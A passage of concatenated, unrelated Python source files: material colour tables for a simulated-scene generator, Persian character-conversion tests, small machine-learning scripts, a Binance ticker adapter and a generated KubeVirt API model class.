"Custom/Materials/Indigo": GOLDENROD, # Not an official opposite
"Custom/Materials/Lime": MAGENTA,
"Custom/Materials/Magenta": LIME,
"Custom/Materials/Maroon": TEAL,
"Custom/Materials/Navy": OLIVE,
"Custom/Materials/Olive": NAVY,
"Custom/Materials/Orange": AZURE,
"Custom/Materials/Purple": GREEN,
"Custom/Materials/Red": CYAN,
"Custom/Materials/Rose": SPRINGGREEN,
"Custom/Materials/SpringGreen": ROSE,
"Custom/Materials/Teal": MAROON,
"Custom/Materials/Violet": CHARTREUSE,
"Custom/Materials/White": BLACK,
"Custom/Materials/Yellow": BLUE
}
ADJACENT_SETS = {
"Custom/Materials/Azure": [BLUE[0], CYAN[0], NAVY[0], TEAL[0]],
"Custom/Materials/Black": [GREY[0]],
"Custom/Materials/Blue": [AZURE[0], INDIGO[0], NAVY[0], VIOLET[0]],
"Custom/Materials/Brown": [
GOLDENROD[0], MAROON[0], OLIVE[0], RED[0], YELLOW[0]
],
"Custom/Materials/Chartreuse": [
GOLDENROD[0], GREEN[0], LIME[0], OLIVE[0], YELLOW[0]
],
"Custom/Materials/Cyan": [AZURE[0], SPRINGGREEN[0], TEAL[0]],
"Custom/Materials/Goldenrod": [
BROWN[0], CHARTREUSE[0], OLIVE[0], ORANGE[0], YELLOW[0]
],
"Custom/Materials/Green": [CHARTREUSE[0], LIME[0], SPRINGGREEN[0]],
"Custom/Materials/Grey": [BLACK[0], WHITE[0]],
"Custom/Materials/Indigo": [BLUE[0], NAVY[0], PURPLE[0], VIOLET[0]],
"Custom/Materials/Lime": [CHARTREUSE[0], GREEN[0], SPRINGGREEN[0]],
"Custom/Materials/Magenta": [PURPLE[0], ROSE[0], VIOLET[0]],
"Custom/Materials/Maroon": [BROWN[0], ORANGE[0], RED[0], ROSE[0]],
"Custom/Materials/Navy": [AZURE[0], BLUE[0], INDIGO[0], VIOLET[0]],
"Custom/Materials/Olive": [
BROWN[0], CHARTREUSE[0], GOLDENROD[0], ORANGE[0], YELLOW[0]
],
"Custom/Materials/Orange": [
GOLDENROD[0], MAROON[0], OLIVE[0], RED[0], YELLOW[0]
],
"Custom/Materials/Purple": [INDIGO[0], MAGENTA[0], ROSE[0], VIOLET[0]],
"Custom/Materials/Red": [BROWN[0], MAROON[0], ORANGE[0], ROSE[0]],
"Custom/Materials/Rose": [MAGENTA[0], MAROON[0], PURPLE[0], RED[0]],
"Custom/Materials/SpringGreen": [CYAN[0], GREEN[0], LIME[0], TEAL[0]],
"Custom/Materials/Teal": [AZURE[0], CYAN[0], SPRINGGREEN[0]],
"Custom/Materials/Violet": [
BLUE[0], INDIGO[0], MAGENTA[0], NAVY[0], PURPLE[0]
],
"Custom/Materials/White": [GREY[0]],
"Custom/Materials/Yellow": [
BROWN[0], CHARTREUSE[0], GOLDENROD[0], OLIVE[0], ORANGE[0]
]
}
_CUSTOM_CARPET_MATERIALS = [('Custom/Materials/GreyCarpetMCS', ['grey'])] + [
(item[0] + 'CarpetMCS', item[1]) for item in OPPOSITE_MATERIALS
]
_CUSTOM_DRYWALL_MATERIALS = [('Custom/Materials/GreyDrywallMCS', ['grey'])] + [
(item[0] + 'DrywallMCS', item[1]) for item in OPPOSITE_MATERIALS
]
_CUSTOM_WOOD_MATERIALS = [('Custom/Materials/GreyWoodMCS', ['grey'])] + [
(item[0] + 'WoodMCS', item[1]) for item in OPPOSITE_MATERIALS
]
BLOCK_BLANK_MATERIALS = [
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/blue_1x1",
["blue"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/gray_1x1",
["grey"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/green_1x1",
["green"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/red_1x1",
["red"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/wood_1x1",
["brown"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/yellow_1x1",
["yellow"])
]
BLOCK_LETTER_MATERIALS = [
("UnityAssetStore/KD_AlphabetBlocks/Assets/Textures/Blue/TOYBlocks_AlphabetBlock_A_Blue_1K/ToyBlockBlueA",
["blue", "brown"]),
("UnityAssetStore/KD_AlphabetBlocks/Assets/Textures/Blue/TOYBlocks_AlphabetBlock_B_Blue_1K/ToyBlockBlueB",
["blue", "brown"]),
("UnityAssetStore/KD_AlphabetBlocks/Assets/Textures/Blue/TOYBlocks_AlphabetBlock_C_Blue_1K/ToyBlockBlueC",
["blue", "brown"]),
("UnityAssetStore/KD_AlphabetBlocks/Assets/Textures/Blue/TOYBlocks_AlphabetBlock_D_Blue_1K/ToyBlockBlueD",
["blue", "brown"]),
("UnityAssetStore/KD_AlphabetBlocks/Assets/Textures/Blue/TOYBlocks_AlphabetBlock_M_Blue_1K/ToyBlockBlueM",
["blue", "brown"]),
("UnityAssetStore/KD_AlphabetBlocks/Assets/Textures/Blue/TOYBlocks_AlphabetBlock_S_Blue_1K/ToyBlockBlueS",
["blue", "brown"])
]
BLOCK_NUMBER_MATERIALS = [
("UnityAssetStore/KD_NumberBlocks/Assets/Textures/Yellow/TOYBlocks_NumberBlock_1_Yellow_1K/NumberBlockYellow_1",
["yellow", "brown"]),
("UnityAssetStore/KD_NumberBlocks/Assets/Textures/Yellow/TOYBlocks_NumberBlock_2_Yellow_1K/NumberBlockYellow_2",
["yellow", "brown"]),
("UnityAssetStore/KD_NumberBlocks/Assets/Textures/Yellow/TOYBlocks_NumberBlock_3_Yellow_1K/NumberBlockYellow_3",
["yellow", "brown"]),
("UnityAssetStore/KD_NumberBlocks/Assets/Textures/Yellow/TOYBlocks_NumberBlock_4_Yellow_1K/NumberBlockYellow_4",
["yellow", "brown"]),
("UnityAssetStore/KD_NumberBlocks/Assets/Textures/Yellow/TOYBlocks_NumberBlock_5_Yellow_1K/NumberBlockYellow_5",
["yellow", "brown"]),
("UnityAssetStore/KD_NumberBlocks/Assets/Textures/Yellow/TOYBlocks_NumberBlock_6_Yellow_1K/NumberBlockYellow_6",
["yellow", "brown"])
]
CARDBOARD_MATERIALS = [
("AI2-THOR/Materials/Misc/Cardboard_Brown", ["brown"]),
("AI2-THOR/Materials/Misc/Cardboard_Tan", ["brown"]),
("AI2-THOR/Materials/Misc/Cardboard_White", ["grey"])
]
CERAMIC_MATERIALS = [
("AI2-THOR/Materials/Ceramics/BrownMarbleFake 1", ["brown"]),
("AI2-THOR/Materials/Ceramics/ConcreteBoards1", ["grey"]),
("AI2-THOR/Materials/Ceramics/ConcreteFloor", ["grey"]),
("AI2-THOR/Materials/Ceramics/GREYGRANITE", ["grey"]),
("AI2-THOR/Materials/Ceramics/PinkConcrete_Bedroom1", ["red"]),
("AI2-THOR/Materials/Ceramics/RedBrick", ["red"]),
("AI2-THOR/Materials/Ceramics/TexturesCom_BrickRound0044_1_seamless_S",
["grey"]),
("AI2-THOR/Materials/Ceramics/WhiteCountertop", ["grey"])
]
FABRIC_MATERIALS = [
("AI2-THOR/Materials/Fabrics/BedroomCarpet", ["blue"]),
("AI2-THOR/Materials/Fabrics/Carpet2", ["brown"]),
("AI2-THOR/Materials/Fabrics/Carpet3", ["brown"]),
("AI2-THOR/Materials/Fabrics/Carpet4", ["blue"]),
("AI2-THOR/Materials/Fabrics/Carpet8", ["black"]),
("AI2-THOR/Materials/Fabrics/CarpetDark", ["yellow"]),
("AI2-THOR/Materials/Fabrics/CarpetDark 1", ["brown"]),
("AI2-THOR/Materials/Fabrics/CarpetDarkGreen", ["green"]),
("AI2-THOR/Materials/Fabrics/CarpetGreen", ["green"]),
("AI2-THOR/Materials/Fabrics/CarpetWhite", ["white"]),
("AI2-THOR/Materials/Fabrics/CarpetWhite 3", ["white"]),
("AI2-THOR/Materials/Fabrics/HotelCarpet", ["red"]),
("AI2-THOR/Materials/Fabrics/HotelCarpet3", ["red", "black"]),
("AI2-THOR/Materials/Fabrics/RUG2", ["red", "blue"]),
("AI2-THOR/Materials/Fabrics/Rug3", ["blue", "red"]),
("AI2-THOR/Materials/Fabrics/RUG4", ["red", "yellow"]),
("AI2-THOR/Materials/Fabrics/Rug5", ["white"]),
("AI2-THOR/Materials/Fabrics/Rug6", ["green", "purple", "red"]),
("AI2-THOR/Materials/Fabrics/RUG7", ["red", "blue"]),
("AI2-THOR/Materials/Fabrics/RugPattern224", ["green", "brown", "white"])
] + _CUSTOM_CARPET_MATERIALS
METAL_MATERIALS = [
("AI2-THOR/Materials/Metals/BlackSmoothMeta", ["black"]),
("AI2-THOR/Materials/Metals/Brass 1", ["yellow"]),
("AI2-THOR/Materials/Metals/BrownMetal 1", ["brown"]),
("AI2-THOR/Materials/Metals/BrushedAluminum_Blue", ["blue"]),
("AI2-THOR/Materials/Metals/BrushedIron_AlbedoTransparency", ["black"]),
("AI2-THOR/Materials/Metals/GenericStainlessSteel", ["grey"]),
("AI2-THOR/Materials/Metals/HammeredMetal_AlbedoTransparency 1",
["green"]),
("AI2-THOR/Materials/Metals/Metal", ["grey"]),
("AI2-THOR/Materials/Metals/WhiteMetal", ["white"]),
("UnityAssetStore/Baby_Room/Models/Materials/cabinet metal", ["grey"])
]
PLASTIC_MATERIALS = [
("AI2-THOR/Materials/Plastics/BlackPlastic", ["black"]),
("AI2-THOR/Materials/Plastics/OrangePlastic", ["orange"]),
("AI2-THOR/Materials/Plastics/WhitePlastic", ["white"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 1",
["red"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 2",
["blue"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 3",
["green"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 4",
["yellow"])
]
RUBBER_MATERIALS = [
("AI2-THOR/Materials/Plastics/BlueRubber", ["blue"]),
("AI2-THOR/Materials/Plastics/LightBlueRubber", ["blue"])
]
WALL_MATERIALS = [
("AI2-THOR/Materials/Walls/BrownDrywall", ["brown"]),
("AI2-THOR/Materials/Walls/Drywall", ["white"]),
("AI2-THOR/Materials/Walls/DrywallBeige", ["brown"]),
("AI2-THOR/Materials/Walls/DrywallGreen", ["green"]),
("AI2-THOR/Materials/Walls/DrywallOrange", ["orange"]),
("AI2-THOR/Materials/Walls/Drywall4Tiled", ["white"]),
("AI2-THOR/Materials/Walls/EggshellDrywall", ["blue"]),
("AI2-THOR/Materials/Walls/RedDrywall", ["red"]),
("AI2-THOR/Materials/Walls/WallDrywallGrey", ["grey"]),
("AI2-THOR/Materials/Walls/YellowDrywall", ["yellow"])
] + _CUSTOM_DRYWALL_MATERIALS
WOOD_MATERIALS = [
("AI2-THOR/Materials/Wood/BedroomFloor1", ["brown"]),
("AI2-THOR/Materials/Wood/BlackWood", ["black"]),
("AI2-THOR/Materials/Wood/DarkWood2", ["black"]),
("AI2-THOR/Materials/Wood/DarkWoodSmooth2", ["black"]),
("AI2-THOR/Materials/Wood/LightWoodCounters 1", ["brown"]),
("AI2-THOR/Materials/Wood/LightWoodCounters3", ["brown"]),
("AI2-THOR/Materials/Wood/LightWoodCounters4", ["brown"]),
("AI2-THOR/Materials/Wood/TexturesCom_WoodFine0050_1_seamless_S",
["brown"]),
("AI2-THOR/Materials/Wood/WhiteWood", ["white"]),
("AI2-THOR/Materials/Wood/WoodFloorsCross", ["brown"]),
("AI2-THOR/Materials/Wood/WoodGrain_Brown", ["brown"]),
("AI2-THOR/Materials/Wood/WoodGrain_Tan", ["brown"]),
("AI2-THOR/Materials/Wood/WornWood", ["brown"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 1",
["blue"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 2",
["red"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 3",
["green"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 4",
["yellow"]),
("UnityAssetStore/Baby_Room/Models/Materials/wood 1", ["brown"])
] + _CUSTOM_WOOD_MATERIALS
SOFA_1_MATERIALS = [
("AI2-THOR/Materials/Fabrics/Sofa1_Brown", ["brown"]),
("AI2-THOR/Materials/Fabrics/Sofa1_Red", ["red"])
]
SOFA_CHAIR_1_MATERIALS = [
("AI2-THOR/Materials/Fabrics/SofaChair1_Black", ["black"]),
("AI2-THOR/Materials/Fabrics/SofaChair1_Brown", ["brown"])
]
SOFA_2_MATERIALS = [
("AI2-THOR/Materials/Fabrics/Sofa2_Grey", ["grey"]),
("AI2-THOR/Materials/Fabrics/Sofa2_White", ["white"])
]
SOFA_3_MATERIALS = [
("AI2-THOR/Materials/Fabrics/Sofa3_Blue", ["blue"]),
("AI2-THOR/Materials/Fabrics/Sofa3_Brown", ["brown"]),
("AI2-THOR/Materials/Fabrics/Sofa3_Green_Dark", ["green"]),
("AI2-THOR/Materials/Fabrics/Sofa3_Red", ["red"])
]
# Choose only ceramic, fabric, metal, and wood materials that aren't too shiny
# or have distracting patterns.
FLOOR_MATERIALS = [
("AI2-THOR/Materials/Fabrics/Carpet2", ["brown"]),
("AI2-THOR/Materials/Fabrics/Carpet3", ["brown"]),
("AI2-THOR/Materials/Fabrics/Carpet4", ["blue"]),
("AI2-THOR/Materials/Fabrics/Carpet8", ["black"]),
("AI2-THOR/Materials/Fabrics/CarpetDark", ["yellow"]),
("AI2-THOR/Materials/Fabrics/CarpetDark 1", ["brown"]),
("AI2-THOR/Materials/Fabrics/CarpetDarkGreen", ["green"]),
("AI2-THOR/Materials/Fabrics/CarpetGreen", ["green"]),
("AI2-THOR/Materials/Fabrics/CarpetWhite", ["white"]),
("AI2-THOR/Materials/Fabrics/CarpetWhite 3", ["white"]),
("AI2-THOR/Materials/Wood/DarkWood2", ["black"]),
("AI2-THOR/Materials/Wood/DarkWoodSmooth2", ["black"]),
("AI2-THOR/Materials/Wood/LightWoodCounters 1", ["brown"]),
("AI2-THOR/Materials/Wood/TexturesCom_WoodFine0050_1_seamless_S",
["brown"]),
("AI2-THOR/Materials/Wood/WornWood", ["brown"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 1",
["blue"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 2",
["red"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 3",
["green"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 4",
["yellow"]),
("UnityAssetStore/Baby_Room/Models/Materials/wood 1", ["brown"])
]
INTUITIVE_PHYSICS_BLOCK_MATERIALS = [
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/blue_1x1",
["blue"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/gray_1x1",
["grey"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/green_1x1",
["green"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/red_1x1",
["red"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/wood_1x1",
["brown"]),
("UnityAssetStore/Wooden_Toys_Bundle/ToyBlocks/meshes/Materials/yellow_1x1",
["yellow"])
]
INTUITIVE_PHYSICS_METAL_MATERIALS = [
("AI2-THOR/Materials/Metals/Brass 1", ["yellow"]),
("AI2-THOR/Materials/Metals/BrownMetal 1", ["brown"]),
("AI2-THOR/Materials/Metals/BrushedAluminum_Blue", ["blue"]),
("AI2-THOR/Materials/Metals/BrushedIron_AlbedoTransparency", ["black"]),
("AI2-THOR/Materials/Metals/GenericStainlessSteel", ["grey"]),
("AI2-THOR/Materials/Metals/HammeredMetal_AlbedoTransparency 1",
["green"]),
("AI2-THOR/Materials/Metals/Metal", ["grey"]),
("UnityAssetStore/Baby_Room/Models/Materials/cabinet metal", ["grey"])
]
INTUITIVE_PHYSICS_PLASTIC_MATERIALS = [
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 1",
["red"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 2",
["blue"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 3",
["green"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color 4",
["yellow"])
]
INTUITIVE_PHYSICS_WOOD_MATERIALS = [
("AI2-THOR/Materials/Wood/DarkWoodSmooth2", ["black"]),
("AI2-THOR/Materials/Wood/LightWoodCounters 1", ["brown"]),
("AI2-THOR/Materials/Wood/LightWoodCounters3", ["brown"]),
("AI2-THOR/Materials/Wood/LightWoodCounters4", ["brown"]),
("AI2-THOR/Materials/Wood/WoodGrain_Brown", ["brown"]),
("AI2-THOR/Materials/Wood/WoodGrain_Tan", ["brown"]),
("AI2-THOR/Materials/Wood/WornWood", ["brown"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 1",
["blue"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 2",
["red"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 3",
["green"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 4",
["yellow"]),
("UnityAssetStore/Baby_Room/Models/Materials/wood 1", ["brown"])
]
# Room and occluder walls in intuitive physics scenes cannot use reflective
# materials, like some ceramics, metals and woods, due to the glare.
INTUITIVE_PHYSICS_WALL_GROUPINGS = [WALL_MATERIALS + [
("AI2-THOR/Materials/Ceramics/BrownMarbleFake 1", ["brown"]),
("AI2-THOR/Materials/Ceramics/ConcreteFloor", ["grey"]),
("AI2-THOR/Materials/Ceramics/GREYGRANITE", ["grey"]),
("AI2-THOR/Materials/Ceramics/RedBrick", ["red"]),
("AI2-THOR/Materials/Ceramics/TexturesCom_BrickRound0044_1_seamless_S",
["grey"]),
("AI2-THOR/Materials/Ceramics/WhiteCountertop", ["grey"]),
("AI2-THOR/Materials/Wood/DarkWoodSmooth2", ["black"]),
("AI2-THOR/Materials/Wood/WornWood", ["brown"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 1",
["blue"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 2",
["red"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 3",
["green"]),
("UnityAssetStore/Kindergarten_Interior/Models/Materials/color wood 4",
["yellow"]),
]]
CEILING_AND_WALL_GROUPINGS = [
CERAMIC_MATERIALS,
# TODO FIXME metallic materials in v0.4.4+
# METAL_MATERIALS,
WALL_MATERIALS,
WOOD_MATERIALS
]
FLAT_MATERIALS = [
AZURE,
BLACK,
BLUE,
BROWN,
CHARTREUSE,
CYAN,
GOLDENROD,
GREEN,
GREY,
INDIGO,
LIME,
MAGENTA,
MAROON,
NAVY,
OLIVE,
ORANGE,
PINK,
RED,
ROSE,
PURPLE,
SPRINGGREEN,
TAN,
TEAL,
VIOLET,
WHITE,
YELLOW
]
ALL_MATERIAL_TUPLES = (
BLOCK_BLANK_MATERIALS +
BLOCK_LETTER_MATERIALS +
BLOCK_NUMBER_MATERIALS +
CARDBOARD_MATERIALS +
CERAMIC_MATERIALS +
FABRIC_MATERIALS +
METAL_MATERIALS +
PLASTIC_MATERIALS +
RUBBER_MATERIALS +
WALL_MATERIALS +
WOOD_MATERIALS +
SOFA_1_MATERIALS +
SOFA_CHAIR_1_MATERIALS +
SOFA_2_MATERIALS +
SOFA_3_MATERIALS +
FLAT_MATERIALS
)
ALL_MATERIAL_STRINGS = list(set([
material_tuple[0] for material_tuple in ALL_MATERIAL_TUPLES
]))
def find_colors(material_name: str, default_value: str = None) -> List[str]:
for item in ALL_MATERIAL_TUPLES:
if item[0] == material_name:
return item[1]
return default_value
ALL_MATERIAL_LISTS = [
x for x in globals() if x.endswith('_MATERIALS') and not x.startswith('_')
]
|
from unittest import TestCase
import pytest
from persiantools import characters, digits
class TestDigits(TestCase):
def test_ar_to_fa(self):
self.assertEqual(characters.ar_to_fa("السلام عليكم"), "السلام علیکم")
self.assertEqual(characters.ar_to_fa("HI ي"), "HI ی")
self.assertEqual(characters.ar_to_fa("دِ بِ زِ ذِ شِ سِ ى ي ك"), "د ب ز ذ ش س ی ی ک")
self.assertEqual(characters.ar_to_fa("دِ بِ زِ ذِ شِ سِ ى ي ك"), "د ب ز ذ ش س ی ی ک")
self.assertEqual(
characters.ar_to_fa("ظ ط ذ د ز ر و ، . ش س ي ب ل ا ت ن م ك ض ص ث ق ف غ ع ه خ ح ؟"),
"ظ ط ذ د ز ر و ، . ش س ی ب ل ا ت ن م ک ض ص ث ق ف غ ع ه خ ح ؟",
)
with pytest.raises(TypeError):
characters.ar_to_fa(12345)
orig = "السلام عليكم ٠١٢٣٤٥٦٧٨٩"
converted = characters.ar_to_fa(orig)
converted = digits.ar_to_fa(converted)
self.assertEqual(converted, "السلام علیکم ۰۱۲۳۴۵۶۷۸۹")
def test_fa_to_fa(self):
self.assertEqual(characters.ar_to_fa("السلام علیکم"), "السلام علیکم")
self.assertEqual(characters.ar_to_fa("السلام علیکم"), "السلام علیکم")
def test_fa_to_ar(self):
self.assertEqual(characters.fa_to_ar("کیک"), "كيك")
with pytest.raises(TypeError):
characters.ar_to_fa(12345)
|
# Set up the paths.
import os
import sys
sys.path.append(os.path.abspath('.'))
import themodule
def test_hallo():
assert themodule.hallo() == "hallo"
def test_nohallo():
assert themodule.hallo() != "blaat"
|
from models.model_plain import ModelPlain
class ModelPlain2(ModelPlain):
"""Train with two inputs (L, C) and with pixel loss"""
# ----------------------------------------
# feed L/H data
# ----------------------------------------
def feed_data(self, data, need_H=True):
self.L = data['L'].to(self.device)
self.C = data['C'].to(self.device)
if need_H:
self.H = data['H'].to(self.device)
# ----------------------------------------
# feed (L, C) to netG and get E
# ----------------------------------------
def netG_forward(self):
self.E = self.netG(self.L, self.C)
|
from random import randint
numeros = (randint(0,10),randint(0,10),
randint(0, 10),randint(0,10),
randint(0, 10))
for n in numeros:
print(f'{n} ', end='')
print('\nO maior numero sorteado e {}.'.format(max(numeros)))
print('O menor numero sorteado e {}.'.format(min(numeros)))
|
import sys
import os
from sklearn.linear_model import LinearRegression
from sklearn.grid_search import GridSearchCV
from utils.CSVHandler import CSVHandler
from utils.Preprocessor import Preprocessor
# from utils.Visualizer import Visualizer
from utils.Logger import Logger
"""
File paths
"""
data_dir = '../data/'
train_filename = 'train.csv'
test_filename = 'test.csv'
"""
Make directory to save result
"""
try:
os.mkdir('./predict/')
except:
pass
# main loop
def main():
csv_handler = CSVHandler(data_dir)
preprocessor = Preprocessor()
# visualizer = Visualizer()
logger = Logger()
# print "load train data and test data"
try:
train = csv_handler.load_csv(train_filename)
test = csv_handler.load_csv(test_filename)
except Exception as e:
logger.show_exception(e)
# print "preprocess the both data"
t_train = train["SalePrice"].values
train, test = preprocessor.preprocess(train, test, except_num=True)
# print "extract target column and feature column for both data"
x_train = train.values
x_test = test.values
# print "save test ids"
test_ids = test.index
# print "design training"
tuned_parameters = [{'normalize': [True, False]}]
reg = GridSearchCV(
LinearRegression(),
tuned_parameters,
cv=5
)
# print "train"
reg.fit(x_train, t_train)
logger.show_training_result(reg)
# print "prediction"
y_train = reg.predict(x_train).astype(int)
y_test = reg.predict(x_test).astype(int)
# print "save"
output = zip(test_ids, y_test)
csv_handler.save_csv(output, 'linear_regression')
# print "show difference between true distribution and prediction"
# visualizer.show_result(t_train, y_train)
# print "everything works well"
return 0
if __name__ == '__main__':
sys.exit(main())
|
from dataclasses import dataclass, field
from enum import Enum
from typing import Optional
__NAMESPACE__ = "NISTSchema-SV-IV-atomic-unsignedShort-enumeration-4-NS"
class NistschemaSvIvAtomicUnsignedShortEnumeration4Type(Enum):
VALUE_3331 = 3331
VALUE_794 = 794
VALUE_91 = 91
VALUE_5792 = 5792
VALUE_5361 = 5361
VALUE_72 = 72
VALUE_1768 = 1768
VALUE_37 = 37
VALUE_464 = 464
@dataclass
class NistschemaSvIvAtomicUnsignedShortEnumeration4:
class Meta:
name = "NISTSchema-SV-IV-atomic-unsignedShort-enumeration-4"
namespace = "NISTSchema-SV-IV-atomic-unsignedShort-enumeration-4-NS"
value: Optional[NistschemaSvIvAtomicUnsignedShortEnumeration4Type] = field(
default=None,
metadata={
"required": True,
}
)
|
# Binance
# https://github.com/binance-exchange/binance-official-api-docs/blob/master/rest-api.md
# By Lari Taskula <lari@taskula.fi>
from exchange import Exchange, CURRENCY
class Binance(Exchange):
name = "Binance"
code = "binance"
ticker = "https://www.binance.com/api/v1/ticker/24hr"
discovery = "https://www.binance.com/api/v1/exchangeInfo"
default_label = "cur"
asset_pairs = [
{'isocode': 'XXBTZUSD', 'pair': 'BTCUSDT', 'name': 'BTC to USD', 'currency': CURRENCY['usd']}
]
@classmethod
def _get_discovery_url(cls):
return cls.discovery
def _get_ticker_url(self):
return self.ticker + '?symbol=' + self.pair
@staticmethod
def _parse_discovery(result):
asset_pairs = []
assets = result.get('symbols')
for asset in assets:
base = asset.get('baseAsset')
quote = asset.get('quoteAsset')
names = {'XZC': 'ZEC', 'BCC': 'BCH', 'IOTA': 'IOT'}
if base in names:
base = names[base]
if quote in names:
quote = names[quote]
asset_pair = {
'pair': asset.get('symbol'),
'base': base,
'quote': quote,
'name': base + ' to ' + quote,
'currency': quote.lower(),
'volumecurrency': base
}
asset_pairs.append(asset_pair)
return asset_pairs
def _parse_ticker(self, asset):
cur = asset.get('lastPrice')
bid = asset.get('bidPrice')
high = asset.get('highPrice')
low = asset.get('lowPrice')
ask = asset.get('askPrice')
vol = asset.get('volume')
return {
'cur': cur,
'bid': bid,
'high': high,
'low': low,
'ask': ask,
'vol': vol
}
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from stw import SupervisedTermWeightingWTransformer
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.svm import LinearSVC
from sklearn.metrics import accuracy_score, recall_score, f1_score
train = pd.read_csv('train.csv')
test = pd.read_csv('test.csv')
# Construct term count matrix for train and test datasets
vectorizer = CountVectorizer(input='filename')
train_x = vectorizer.fit_transform(train['filename'])
train_y = train['target']
test_x = vectorizer.transform(test['filename'])
test_y = test['target']
# Use SVM as classifier
clf = LinearSVC()
# tf-idf unsupervised term weighting
transformer = TfidfTransformer()
train_x_t = transformer.fit_transform(train_x,train_y)
test_x_t = transformer.transform(test_x)
# Train classifier and make predictions
clf.fit(train_x_t,train_y)
pred = clf.predict(test_x_t)
# Assess performance
print 'tf-idf scheme: accuracy = %0.2f, recall = %0.2f, f1 score = %0.2f' % \
(accuracy_score(test_y,pred), recall_score(test_y,pred), f1_score(test_y,pred))
# Supervised term weighting schemes
for scheme in ['tfchi2','tfig','tfgr','tfor','tfrf']:
transformer = SupervisedTermWeightingWTransformer(scheme=scheme)
train_x_t = transformer.fit_transform(train_x,train_y)
test_x_t = transformer.transform(test_x)
# Train classifier and make predictions
clf.fit(train_x_t,train_y)
pred = clf.predict(test_x_t)
# Assess performance
print '%s scheme: accuracy = %0.2f, recall = %0.2f, f1 score = %0.2f' % \
(scheme, accuracy_score(test_y,pred), recall_score(test_y,pred), f1_score(test_y,pred))
|
# coding: utf-8
"""
KubeVirt API
This is KubeVirt API an add-on for Kubernetes.
OpenAPI spec version: 1.0.0
Contact: kubevirt-dev@googlegroups.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1KubeVirtWorkloadUpdateStrategy(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'batch_eviction_interval': 'K8sIoApimachineryPkgApisMetaV1Duration',
'batch_eviction_size': 'int',
'workload_update_methods': 'list[str]'
}
attribute_map = {
'batch_eviction_interval': 'batchEvictionInterval',
'batch_eviction_size': 'batchEvictionSize',
'workload_update_methods': 'workloadUpdateMethods'
}
def __init__(self, batch_eviction_interval=None, batch_eviction_size=None, workload_update_methods=None):
"""
V1KubeVirtWorkloadUpdateStrategy - a model defined in Swagger
"""
self._batch_eviction_interval = None
self._batch_eviction_size = None
self._workload_update_methods = None
if batch_eviction_interval is not None:
self.batch_eviction_interval = batch_eviction_interval
if batch_eviction_size is not None:
self.batch_eviction_size = batch_eviction_size
if workload_update_methods is not None:
self.workload_update_methods = workload_update_methods
@property
def batch_eviction_interval(self):
"""
Gets the batch_eviction_interval of this V1KubeVirtWorkloadUpdateStrategy.
BatchEvictionInterval Represents the interval to wait before issuing the next batch of shutdowns Defaults to 1 minute
:return: The batch_eviction_interval of this V1KubeVirtWorkloadUpdateStrategy.
:rtype: K8sIoApimachineryPkgApisMetaV1Duration
"""
return self._batch_eviction_interval
@batch_eviction_interval.setter
def batch_eviction_interval(self, batch_eviction_interval):
"""
Sets the batch_eviction_interval of this V1KubeVirtWorkloadUpdateStrategy.
BatchEvictionInterval Represents the interval to wait before issuing the next batch of shutdowns Defaults to 1 minute
:param batch_eviction_interval: The batch_eviction_interval of this V1KubeVirtWorkloadUpdateStrategy.
:type: K8sIoApimachineryPkgApisMetaV1Duration
"""
self._batch_eviction_interval = batch_eviction_interval
@property
def batch_eviction_size(self):
"""
Gets the batch_eviction_size of this V1KubeVirtWorkloadUpdateStrategy.
BatchEvictionSize Represents the number of VMIs that can be forced updated per the BatchShutdownInteral interval Defaults to 10
:return: The batch_eviction_size of this V1KubeVirtWorkloadUpdateStrategy.
:rtype: int
"""
return self._batch_eviction_size
@batch_eviction_size.setter
def batch_eviction_size(self, batch_eviction_size):
"""
Sets the batch_eviction_size of this V1KubeVirtWorkloadUpdateStrategy.
BatchEvictionSize Represents the number of VMIs that can be forced updated per the BatchShutdownInteral interval Defaults to 10
